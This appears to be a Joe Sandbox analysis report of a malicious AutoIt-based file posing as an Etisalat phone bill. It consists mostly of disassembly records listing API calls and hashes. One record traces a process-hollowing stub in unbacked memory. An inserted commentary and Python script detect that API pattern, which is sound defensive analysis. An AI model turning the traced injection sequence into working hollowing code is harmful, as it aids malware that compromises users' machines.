                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00B65981,?,?,?,?), ref: 00B9E19C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 08dcddef0032342e7357d51bc18e893aab29ae45739c57bfb7113836d067a107
                                      • Instruction ID: 812ad36304bcb4fe056f322de5c932c9c4063bcaf6fb9c4e5350beef71d174f8
                                      • Opcode Fuzzy Hash: 08dcddef0032342e7357d51bc18e893aab29ae45739c57bfb7113836d067a107
                                      • Instruction Fuzzy Hash: 14019E70244709BEFB344E24CC8AF763ADCEB05768F108358BAE56A1E0C6B95E558B51
                                      APIs
                                        • Part of subcall function 00B8594C: __FF_MSGBANNER.LIBCMT ref: 00B85963
                                        • Part of subcall function 00B8594C: __NMSG_WRITE.LIBCMT ref: 00B8596A
                                        • Part of subcall function 00B8594C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00B81013,?), ref: 00B8598F
                                      • std::exception::exception.LIBCMT ref: 00B8102C
                                      • __CxxThrowException@8.LIBCMT ref: 00B81041
                                        • Part of subcall function 00B887DB: RaiseException.KERNEL32(?,?,?,00C1BAF8,00000000,?,?,?,?,00B81046,?,00C1BAF8,?,00000001), ref: 00B88830
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 3902256705-0
                                      • Opcode ID: 35bf882501a8c7512ed74202293525a4271bd29b1dc2b2394f2a68970c593b27
                                      • Instruction ID: 516ed836385544c074979db5c1ef637c6381a68e3eae806a685406a4f3d7c551
                                      • Opcode Fuzzy Hash: 35bf882501a8c7512ed74202293525a4271bd29b1dc2b2394f2a68970c593b27
                                      • Instruction Fuzzy Hash: F9F0D13950021DA7CB20BB58EC029EE7BECDF01350F1008E5F904921A1EFB18A85D7A1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      • Opcode ID: 3d9b212a96e850a16a08592156a4d83c20863ae98d461eca268ffcf40c743b4c
                                      • Instruction ID: d68e743bfc43f2247b1094dcc76aa1b8a3b956a9db4f2388950dcf355d60ed7d
                                      • Opcode Fuzzy Hash: 3d9b212a96e850a16a08592156a4d83c20863ae98d461eca268ffcf40c743b4c
                                      • Instruction Fuzzy Hash: 29018471800609EBCF32BF69CC0559F7BE5AF80760F5482A6B8145A1B1DB318A51DB91
                                      APIs
                                        • Part of subcall function 00B88D68: __getptd_noexit.LIBCMT ref: 00B88D68
                                      • __lock_file.LIBCMT ref: 00B8561B
                                        • Part of subcall function 00B86E4E: __lock.LIBCMT ref: 00B86E71
                                      • __fclose_nolock.LIBCMT ref: 00B85626
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      • Opcode ID: 37e8d6c12fc0a38b84d4339107de03e04c101a54110d85be8a8bec3234c9a17b
                                      • Instruction ID: f92fcd8978ef61b1d218ba757163b4c69c73c7b247127d57e1eb0ef9e4e0d867
                                      • Opcode Fuzzy Hash: 37e8d6c12fc0a38b84d4339107de03e04c101a54110d85be8a8bec3234c9a17b
                                      • Instruction Fuzzy Hash: B0F0B471800A049BD730BF75880276E77E16F41334F9582C9A415AB1E1DF7C8941DF95
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00B6558F,?,?,?,?,?), ref: 00B681DA
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00B6558F,?,?,?,?,?), ref: 00B6820D
                                        • Part of subcall function 00B678AD: _memmove.LIBCMT ref: 00B678E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_memmove
                                      • String ID:
                                      • API String ID: 3033907384-0
                                      • Opcode ID: 3e1af04a2c1fbe7c52fc72f9691234c227eae1d7ae60fd8646c5c66da3007194
                                      • Instruction ID: b5b15e685d1bc9e30635def29cea2a9eec1365e78a7e9934b1af3ddc5676f0b5
                                      • Opcode Fuzzy Hash: 3e1af04a2c1fbe7c52fc72f9691234c227eae1d7ae60fd8646c5c66da3007194
                                      • Instruction Fuzzy Hash: FF01AD31241244BFEB246A25DD9AF7B3FACEB89760F10816AFD05DE1A0DE319800C671
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015E1ABB
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015E1B51
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015E1B73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                      • Instruction ID: 2ed75724e6c9ef180a725e123d74b21891f6d5d999589c75ce551b98377135b2
                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                      • Instruction Fuzzy Hash: A912ED20E24658C6EB24DF64D8547DEB272FF68300F1090E9910DEB7A4E77A4F81CB5A
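The record above (CreateProcessW, then Wow64GetThreadContext with flags 00010007, which is CONTEXT_FULL for an x86 thread, then a 4-byte ReadProcessMemory) is the prologue of process hollowing: spawn a child, fetch its initial thread context, and read the child's image base out of its PEB. It sits at 015E0000, a region the report marks "based on PE: false", i.e. not backed by a module on disk. As an added example, not Joe Sandbox code and not part of this report, the following parser walks "IDA Plugin" records in this format and flags functions that combine those API stages, using the "based on PE" flag as an unbacked-memory indicator. Assumptions: the sample records are constructed from trimmed lines of this report, the stage sets are my own heuristic, and the reading of the fifth dot-separated field of the .sdmp name as the region's page protection (0x20 PAGE_EXECUTE_READ, 0x40 PAGE_EXECUTE_READWRITE) is an inference from the values on this page, not documented Joe Sandbox behaviour.

```python
"""Flag the process-hollowing API pattern in Joe Sandbox 'IDA Plugin' records.

Added example; not Joe Sandbox code. Assumptions are marked inline.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed input: trimmed copies of two records from the report, the
# 015E1ABB stub in an unbacked region and a benign CRT file helper.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 015E1ABB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015E1B51
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015E1B73
Memory Dump Source
• Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
Similarity
• Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
• Instruction Fuzzy Hash: A912ED20E24658C6EB24DF64D8547DEB272FF68300F1090E9910DEB7A4E77A4F81CB5A
APIs
• SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00B65CF6
  • Part of subcall function 00B678AD: _memmove.LIBCMT ref: 00B678E9
Memory Dump Source
• Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
Similarity
• Opcode ID: 44466830223a80f4a27e5d13356c679dee43e10bf14b3d7fe4bb36afbcbd3903
• Instruction Fuzzy Hash: DA314C71A00B1AAFCB28DF2DC884A6DB7F5FF48310F148669E81993750D775B960DB90
"""


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int          # address of the call site
    subcall: bool     # True when listed as "Part of subcall function"


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    offset: int | None = None
    based_on_pe: bool | None = None
    protect: int | None = None   # assumption: 5th field of the .sdmp name
    opcode_id: str | None = None


# "• Name.MODULE(args), ref: ADDR" and "• Part of subcall function X: Name.MODULE ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
SOURCE_LINE = re.compile(
    r"^\s*•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
OPCODE_LINE = re.compile(r"^\s*•\s*Opcode ID:\s*([0-9a-f]{64})")
END_LINE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")   # last line of every record


def parse_records(text: str) -> list[FunctionRecord]:
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        if m := API_LINE.match(line):
            cur.apis.append(ApiCall(m.group(2), m.group(3), int(m.group(5), 16), m.group(1) is not None))
        elif m := SOURCE_LINE.match(line):
            cur.offset = int(m.group(2), 16)
            cur.based_on_pe = m.group(3) == "true"
            fields = m.group(1).split(".")
            if len(fields) > 4:                       # assumption: protection field
                cur.protect = int(fields[4], 16)
        elif m := OPCODE_LINE.match(line):
            cur.opcode_id = m.group(1)
        elif END_LINE.match(line):
            records.append(cur)
            cur = FunctionRecord()
    return records


# Heuristic stage sets (my own grouping), covering both Win32 and WoW64 variants.
STAGES = {
    "spawn":   {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext", "SetThreadContext", "Wow64SetThreadContext"},
    "memory":  {"ReadProcessMemory", "WriteProcessMemory", "NtUnmapViewOfSection", "VirtualAllocEx"},
    "resume":  {"ResumeThread", "NtResumeThread"},
}


def hollowing_indicators(rec: FunctionRecord) -> dict:
    names = {a.name for a in rec.apis}
    stages = [s for s, apis in STAGES.items() if names & apis]
    return {
        "offset": rec.offset,
        "stages": stages,
        "unbacked": rec.based_on_pe is False,   # report says the region is not an on-disk PE
        "rwx": rec.protect == 0x40,             # PAGE_EXECUTE_READWRITE, under the assumption above
        "suspicious": "spawn" in stages and "context" in stages and len(stages) >= 3,
    }


def find_hollowing(text: str) -> list[dict]:
    return [ind for ind in map(hollowing_indicators, parse_records(text)) if ind["suspicious"]]


if __name__ == "__main__":
    for hit in find_hollowing(SAMPLE):
        print(f"{hit['offset']:08X}: stages={hit['stages']} unbacked={hit['unbacked']} rwx={hit['rwx']}")
```

Run against a whole report, the interesting hits are the ones where "unbacked" is true: a hollowing prologue inside the legitimate AutoIt runtime image would be a false positive (AutoIt's Run/ShellExecute wrappers also call CreateProcessW), whereas the same triad in a private RWX region is the injected stub doing the work.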
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a9ae27f9cc1bb0d31ba8fc345dbade6f90fa1751a842c2325eb46984bdab2677
                                      • Instruction ID: 4a790f584ebcdc2bbf4936a799f1447d6e75adcc881da36a76e2817095ff17da
                                      • Opcode Fuzzy Hash: a9ae27f9cc1bb0d31ba8fc345dbade6f90fa1751a842c2325eb46984bdab2677
                                      • Instruction Fuzzy Hash: 0161BB70A0024A9FCB10EF64D991A7BB7F5EF45300F1480BDE9169B251EB78ED51CB51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 72e67e7645cb207474cd153b953b556af364519aa69dca965801b5499a21be95
                                      • Instruction ID: e1a539d239ffd7cca517e77eb99bcb678677e866e2b2d833bd51e79802f52309
                                      • Opcode Fuzzy Hash: 72e67e7645cb207474cd153b953b556af364519aa69dca965801b5499a21be95
                                      • Instruction Fuzzy Hash: 34518F34604604AFCF14EB68C991EBE77E6EF45310F1880E8F91AAB292CB34ED00CB51
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00B65CF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 44466830223a80f4a27e5d13356c679dee43e10bf14b3d7fe4bb36afbcbd3903
                                      • Instruction ID: 2b347d21e0edd19ccae836d29b7ddd132dfe84f808796487caf129bbcafc5287
                                      • Opcode Fuzzy Hash: 44466830223a80f4a27e5d13356c679dee43e10bf14b3d7fe4bb36afbcbd3903
                                      • Instruction Fuzzy Hash: DA314C71A00B1AAFCB28DF2DC884A6DB7F5FF48310F148669E81993750D775B960DB90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 609c161eba72917db5cca82c50bc6ad06f35aab1c04ae8e9687961c585687536
                                      • Instruction ID: 859879a6eb8ae7f8b2f82d121898b7b27113e8402dc9415530a43c71d828e1c9
                                      • Opcode Fuzzy Hash: 609c161eba72917db5cca82c50bc6ad06f35aab1c04ae8e9687961c585687536
                                      • Instruction Fuzzy Hash: AC41D3745083519FDB24DF14C884B1ABBE0FF45318F1988ACE8999B762C736E885CF52
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: c2f018723381ed9b9a79b4d3f680f00a4f941672c651999593b6f5d931e5c7d4
                                      • Instruction ID: 6b99fc926c0cd0e8c8c884419aa9e6f8040f9d33a36060f26c3acbe3e65c64ce
                                      • Opcode Fuzzy Hash: c2f018723381ed9b9a79b4d3f680f00a4f941672c651999593b6f5d931e5c7d4
                                      • Instruction Fuzzy Hash: 4A21AE31A00A08EBDF209F51E8867AE7FF8FF11350F25C8AAE495D5010EB71E4A0DB45
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscmp
                                      • String ID:
                                      • API String ID: 856254489-0
                                      • Opcode ID: 68797a7f1e5acf589087a01ff25c5e04ad5055052ffec773ad50e6e9d0a9acef
                                      • Instruction ID: 3ca862a68cb637886caca043121efa6889fc4a489db8db8601c5ad1e7d33e387
                                      • Opcode Fuzzy Hash: 68797a7f1e5acf589087a01ff25c5e04ad5055052ffec773ad50e6e9d0a9acef
                                      • Instruction Fuzzy Hash: 99117272904119EBCB14EBA9DC819FEFBF8EF55760F1081A6E851A7190EB349D05CB90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscmp
                                      • String ID:
                                      • API String ID: 856254489-0
                                      • Opcode ID: 201ac7a85b4103673cdb9dfb36aa90fe725ccbbe53e4c32ddd704d888609111e
                                      • Instruction ID: 381b2829ebbd292b77b2699fa91818f15b782542a118711384bed764c28cabd7
                                      • Opcode Fuzzy Hash: 201ac7a85b4103673cdb9dfb36aa90fe725ccbbe53e4c32ddd704d888609111e
                                      • Instruction Fuzzy Hash: 6D113672D082464FD7118B28DC242EAFFF5AF56720F1940DBC890AB292E3689C81CB81
                                      APIs
                                        • Part of subcall function 00B64D13: FreeLibrary.KERNEL32(00000000,?), ref: 00B64D4D
                                        • Part of subcall function 00B8548B: __wfsopen.LIBCMT ref: 00B85496
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64F6F
                                        • Part of subcall function 00B64CC8: FreeLibrary.KERNEL32(00000000), ref: 00B64D02
                                        • Part of subcall function 00B64DD0: _memmove.LIBCMT ref: 00B64E1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load__wfsopen_memmove
                                      • String ID:
                                      • API String ID: 1396898556-0
                                      • Opcode ID: 814249ce7f57096bb8b7fd81c95f5064d53afe4b212618e9a75bf348f0fc76f6
                                      • Instruction ID: 74990b090b2f78dfe1295fc40d2a4ff1d37ba74e60e07f76226423e28704806a
                                      • Opcode Fuzzy Hash: 814249ce7f57096bb8b7fd81c95f5064d53afe4b212618e9a75bf348f0fc76f6
                                      • Instruction Fuzzy Hash: FF11E731600A09AACF20BF71CC42FAE77E4DF40700F1084B9F545AB2C1DB799A159B50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 5c9274aeac22f8fa61a458626499b29339f8a972dd64afdf6c14c5b8ee5fa8ec
                                      • Instruction ID: 605046c369dc6f00fe199ab8f86ae3d76d92b25abde104c145dbeb6bdd75b271
                                      • Opcode Fuzzy Hash: 5c9274aeac22f8fa61a458626499b29339f8a972dd64afdf6c14c5b8ee5fa8ec
                                      • Instruction Fuzzy Hash: 162113B4508341DFCB14DF14C884A1ABBE4FF89314F0489A8E89A57761D736E845CF53
                                      APIs
                                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00B65807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B65D76
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 744f32270f4694e1b9f57665a8c5750609f8fb3242431bbff99308607730fede
                                      • Instruction ID: f8869905e3e7ee2bc5ce9941424a3bff4fb67c6923b12f89b12fe2a50a16bd2e
                                      • Opcode Fuzzy Hash: 744f32270f4694e1b9f57665a8c5750609f8fb3242431bbff99308607730fede
                                      • Instruction Fuzzy Hash: F0113A31200B059FD3308F15C484F66B7E5FF45750F10C96EE5AA86A90D774E955CB60
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
